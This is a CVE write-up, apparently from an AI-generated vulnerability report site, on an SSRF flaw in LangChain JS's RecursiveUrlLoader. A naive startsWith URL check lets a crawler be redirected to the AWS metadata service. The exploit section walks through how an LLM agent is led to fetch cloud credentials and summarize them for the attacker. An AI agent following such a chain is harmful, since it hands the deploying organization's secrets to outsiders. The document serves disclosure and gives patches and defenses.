CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-26019
4.1

Spider in the Web: Escaping LangChain's Crawler Sandbox via SSRF

Alon Barad
Alon Barad
Software Engineer

Feb 12, 2026·6 min read·13 visits

PoC Available

Executive Summary (TL;DR)

The RecursiveUrlLoader in LangChain JS used `startsWith()` to validate URLs, allowing attackers to bypass domain restrictions and scan internal networks or steal cloud credentials.

A logic flaw in the LangChain JS `@langchain/community` package allows for Server-Side Request Forgery (SSRF) within the `RecursiveUrlLoader`. By bypassing a weak string-prefix validation check, attackers can force the crawler to access internal network resources, local loopback interfaces, or cloud metadata services. Since the output of this loader is typically fed into an LLM for summarization or processing, this vulnerability transforms a simple network scan into a high-fidelity data exfiltration pipeline.

The Hook: Feeding the Beast

In the modern AI ecosystem, data is oxygen. We build agents, give them tools, and tell them to "go forth and learn." One of the most popular tools in the LangChain arsenal is the RecursiveUrlLoader. It's essentially a web spider in a box—you point it at a documentation site or a wiki, and it recursively scrapes every link it finds to build a knowledge base for your RAG (Retrieval-Augmented Generation) pipeline.

But here's the thing about giving a robot a web browser: unless you put a leash on it, it's going to wander into your backyard. The developers knew this. They implemented a preventOutside flag, enabled by default, intended to keep the spider inside the garden fence (the target domain). Ideally, if you point it at https://docs.example.com, it shouldn't wander off to https://pornhub.com or, more importantly, http://169.254.169.254 (the AWS metadata service).

CVE-2026-26019 is the story of how that leash was made of wet paper. It turns out that validating URLs is hard, and using string manipulation to do it is almost always a death sentence for security.

The Flaw: The 'startsWith' Fallacy

The root cause of this vulnerability is a classic developer mistake: confusing a string prefix with a security boundary. To enforce the preventOutside rule, the code needed to check if a discovered link belonged to the same origin as the base URL.

Instead of parsing the URL into its component parts (protocol, hostname, port) and comparing them semantically, the code did this:

// The 'Security' Check
const isAllowed = !this.preventOutside || link.startsWith(baseUrl);

If you are a security researcher, you are likely grinning right now. If you are a developer, let me explain why this is catastrophic. In the world of URLs, startsWith is meaningless for origin validation. If my baseUrl is https://example.com, obviously https://example.com/page2 passes. But so does https://example.com.attacker.com.

This is the "Golden Key" bypass. By simply registering a domain that starts with the target string, or utilizing certain URL formatting tricks (like the @ symbol for authentication segments), an attacker can fool the crawler into thinking an external, malicious, or internal IP is actually part of the allowed zone.

The Code: From Negligence to Sanity

Let's look at the smoking gun. The vulnerability existed in RecursiveUrlLoader prior to version 1.1.14. The fix involved ripping out the naive string comparison and replacing it with a dedicated SSRF protection module that actually understands what a URL is.

The Vulnerable Code:

// recursive_url.ts (Pre-patch)
// 🚩 Narrative: "Looks like the base URL? Must be safe!"
if (this.preventOutside && !link.startsWith(this.url)) {
  continue;
}

The Patched Code:

// recursive_url.ts (Patched)
// 🛡️ Narrative: "Check origin, check IP, check everything."
import { isSameOrigin, validateSafeUrl } from "@langchain/core/utils/ssrf";
 
// ... inside the loop
if (this.preventOutside && !isSameOrigin(link, this.url)) {
  continue;
}
 
// The real MVP: Proactive IP validation before fetch
if (!(await validateSafeUrl(link))) {
  throw new Error("Potentially unsafe URL detected");
}

The patch introduced validateSafeUrl, which does the heavy lifting. It blocks Private IP ranges (RFC 1918), loopback addresses (127.0.0.1), and the notorious cloud metadata IP (169.254.169.254). It also handles the semantic origin check correctly, ensuring that example.com.evil.com is treated as a different origin than example.com.

The Exploit: Exfiltrating Cloud Credentials

So, how do we weaponize this? We need two things: a way to feed the crawler a starting URL (or control a page it visits), and a target worth stealing. In a cloud environment, the target is almost always the Instance Metadata Service (IMDS).

The Setup:

  1. The victim is running a LangChain agent on AWS EC2/Lambda.
  2. The agent uses RecursiveUrlLoader to scrape a URL provided by the user (or a URL the attacker can modify).

The Attack Chain:

  1. Bypass the Scope: The attacker hosts a malicious page at https://target-site.com.attacker-controlled.net. If the user points the loader here, or if the loader crawls here from a valid site (via an open redirect or comment section), the startsWith check passes because the string matches the prefix.

  2. The Redirection (SSRF): On the attacker's page, we place a link or an HTTP redirect to http://169.254.169.254/latest/meta-data/iam/security-credentials/.

  3. The Exfiltration: This is where LangChain makes the vulnerability worse than a standard SSRF. A standard SSRF might just be "blind" (you can send requests but not see responses). But the entire purpose of this component is to read the response body and return it as text to the LLM.

  4. The Payday: The loader fetches the metadata, believing it to be just another web page. It passes the AWS keys to the LLM. The attacker then asks the LLM: "Summarize the documents you just crawled." The LLM happily replies: "I found some JSON data containing an AccessKeyId and a SecretAccessKey..."

The Impact: Why This Matters

SSRF in AI agents is a distinct beast. In traditional web apps, SSRF is often used to port scan internal networks or hit legacy administrative interfaces. In AI, it is an Identity Theft vector.

Because the RecursiveUrlLoader is designed to ingest unstructured text, it bypasses many of the format-based protections that might stop other SSRF attacks (like expecting HTML). It will happily ingest JSON, XML, or raw text credentials.

If this runs in a cloud environment (AWS, GCP, Azure) without strict IMDSv2 token requirements, a single crawl can result in full account takeover. Furthermore, because the "User Interaction" metric is required (someone has to tell the bot to crawl), the CVSS score (4.1) deceptively masks the critical nature of the flaw. If you are building a "Chat with Website" feature, this is a Critical vulnerability for your infrastructure.

Mitigation: Patching the Hole

The immediate fix is simple: Upgrade @langchain/community to version 1.1.14 or later. This pulls in the new SSRF protections.

However, code fixes are only one layer of defense. You should treat the environment your AI agents run in as hostile.

  1. Network Segmentation: Why does your AI scraping container need access to your internal HR portal or the AWS Metadata service? It doesn't. Use iptables or Security Groups to block egress traffic to 10.0.0.0/8, 192.168.0.0/16, and 169.254.169.254.
  2. Enforce IMDSv2: If you are on AWS, enforce IMDSv2 (Session-oriented). This requires a PUT request with specific headers to get a token before reading metadata. Simple GET based SSRF (like this web crawler) cannot generate those headers, effectively neutralizing the cloud credential theft vector.
  3. Input Validation: Never trust a URL provided by a user. Even with the patch, users might find ways to abuse the crawler to ddos external sites. Rate limit and allowlist domains wherever possible.

Official Patches

LangChainPull Request implementing strict origin checks and IP validation

Fix Analysis (1)

Technical Appendix

CVSS Score
4.1/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

Affected Systems

@langchain/community < 1.1.14Applications using RecursiveUrlLoader

Affected Versions Detail

Product
Affected Versions
Fixed Version
@langchain/community
langchain-ai
< 1.1.141.1.14
AttributeDetail
CWE IDCWE-918
Attack VectorNetwork
CVSS Score4.1 (Medium)
ImpactConfidentiality (Low), Scope Changed
Vulnerable LogicString.startsWith() bypass
Target ComponentRecursiveUrlLoader

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1552.005Cloud Instance Metadata API
Credential Access
CWE-918
Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF)

Known Exploits & Detection

HypotheticalConstructed scenario using prefix-matching domain bypass to access AWS Metadata.

Vulnerability Timeline

Vulnerability Published
2026-02-11
Patch Released in v1.1.14
2026-02-11

References & Sources

  • [1]GHSA-gf3v-fwqg-4vh7 Advisory
  • [2]OWASP SSRF Prevention Cheat Sheet

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.